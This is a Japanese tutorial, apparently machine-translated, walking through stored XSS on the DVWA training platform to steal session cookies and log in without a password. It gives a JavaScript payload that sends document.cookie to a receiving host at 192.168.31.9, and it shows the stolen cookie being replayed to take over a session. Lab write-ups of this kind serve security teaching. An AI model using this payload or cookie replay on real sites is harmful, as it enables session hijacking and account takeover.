XSSホールを使ってユーザークッキーを取得し、秘密登録試験を免除する.


XSSホールを使ってクッキーを盗み、パスワードをバイパスして登録します.
まず環境の構築、DVWAプラットフォームのXSSホールを使って、このDVWAのXSSホールは前で全部話したことがあります.だから、私達はLOW等級を使ってcookieを取得して、ウェブサーバに保存します.ここでLOW等級を使うのは便利です.他の等級は同じやり方です.構造の脚本だけが違っています.
スクリプトを使ってクッキーを取得します.
alert(document.cookie)
これは簡単なXSSホールで、ユーザーのクッキーをイジェクトすることができますが、今はクッキーをイジェクトするのではなく、他のサーバに保存します.このクッキーを入手して、クッキーを使ってパスワードをバイパスして登録します.
まず、cookieを取得し、ファイルとして保存できるphpファイルを作成します.

注意:ディレクトリの下でファイルを作成または変更するには、書き込み権限が必要です.一般ディレクトリのユーザーはrootユーザーとユーザーグループのユーザーが書き込み権限を持っていますが、他のユーザーはいません.ローカルではphpを実行してファイルを作成することができますが、ウェブを通じてはいけません.
その後、cookieを受信するために私達のウェブサイトを構築し、上記のコードをcookie.phpというファイルに書き込み、ウェブサイトのルートディレクトリの下に保存します.このファイルにアクセスできるように保証します.
Cookie.php

クッキーを盗むスクリプトを作成
document.location='http://192.168.31.9/cookie.php?x='+document.cookie;
jsスクリプトを入力して、サイトのルートディレクトリの下で見ると、クッキーの値が見えます.
PHPSESSID=u49cvchncj11de0vgvnbu47fa3; security=low
しかし、一般ユーザーはこのように入力しないはずです.だから、私達は記憶型XSSで実現します.
lowレベルのXSSにはガードがありません.効果を簡単に見るために直接メッセージボックスに入力します.長さ制限がありますので、右クリックで要素を確認し、最大長さを200に変更します.
document.location='http://192.168.31.9/cookie.php?x='+document.cookie;
クリックして確認するとxssホールが発生しますが、現在取得しているのは私達自身ですので、cookie.txtファイルを削除してDVWAを脱退し、再登録して、記憶型XSSをクリックすると、ジャンプします.しかし、DVWAのクッキーは時間によって変化しますので、間隔が短い場合は、取得したクッキーは同じです.
クッキーを使ってパスワードをバイパスして登録します.
まずDVWAインターフェースでクッキー値を修正します.
F 12を押して、格納中にクッキーを見つけて、クッキー値を修正します.DVWAのクッキーは二つの部分を含みます.クッキー値と等級は全部修正します.
変更後に直接アクセスする
http://192.168.31.9:8088/security.php
直接アクセスできます.これでユーザーパスワードを避けてログインします.
リンクを使って取得する
test 3
リンクをクリックするとxssホールが発生します.ユーザーが取得できます.